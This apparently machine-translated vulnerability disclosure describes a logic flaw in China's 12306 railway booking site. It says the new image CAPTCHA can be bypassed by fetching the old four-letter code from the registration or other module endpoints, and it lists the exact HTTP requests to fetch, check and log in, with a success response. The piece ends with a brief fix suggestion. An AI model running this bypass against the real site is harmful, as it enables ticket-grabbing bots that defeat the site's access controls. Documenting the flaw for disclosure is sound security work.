12306 logic vulnerabilities in the image Verification Code selected in the new version cause the restriction to be bypassed (theoretically, the ticket grabbing software can be revived)

12306 logic vulnerabilities in the image Verification Code selected in the new version cause the restriction to be bypassed (theoretically, the ticket grabbing software can be revived)

The new image verification code is indeed more difficult than the previous four-letter verification code, and Chinese recognition is also more difficult. However, 12306 of new image verification codes are found to have a bypass vulnerability, this vulnerability may be caused by incomplete updates.

12306 the new image verification code can be bypassed. You can continue to use the old 4-letter verification code to log on to 12306.

The old 4-letter verification code is easy to recognize by the computer. You can log on directly using registration or other verification code interfaces.

Vulnerability 1:

Https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew? Module = regist & rand = sjrand & 0.54322674895787

Vulnerability 2:

Https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew? Module = other & rand = sjrand & 0.36124213441517

Change the moudle to obtain the verification code for different operations. For example, the Order is passenger.


The two connections can obtain a 4-letter verification code, and the 12306 login interface can use the Verification Code recognized here to log on directly. In this case, the new image verification code is essentially a false one.

 

 

 

 

1. Obtain the verification code first (the old 4-letter verification code)

GET https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=regist&rand=sjrand&0.54322674895787 HTTP/1.1

2. Check that the verification code is correct.

POST https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn HTTP/1.1randCode=9npm&rand=sjrand&randCode_validate=

3. Post to the Login URL to log on.

POST https://kyfw.12306.cn/otn/login/loginAysnSuggest HTTP/1.1loginUserDTO.user_name=xxxx&userDTO.password=xxxx&randCode=9npm&randCode_validate=&MTA4OTAx=Yzk1NzdkZGMwZTBiYTE4Nw==&myversion=undefined{"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"loginCheck":"Y"},"messages":[],"validateMessages":{}}

The verification code for the selected image is useless.
 

Solution:

We recommend that you update the verification code to check for the vulnerability.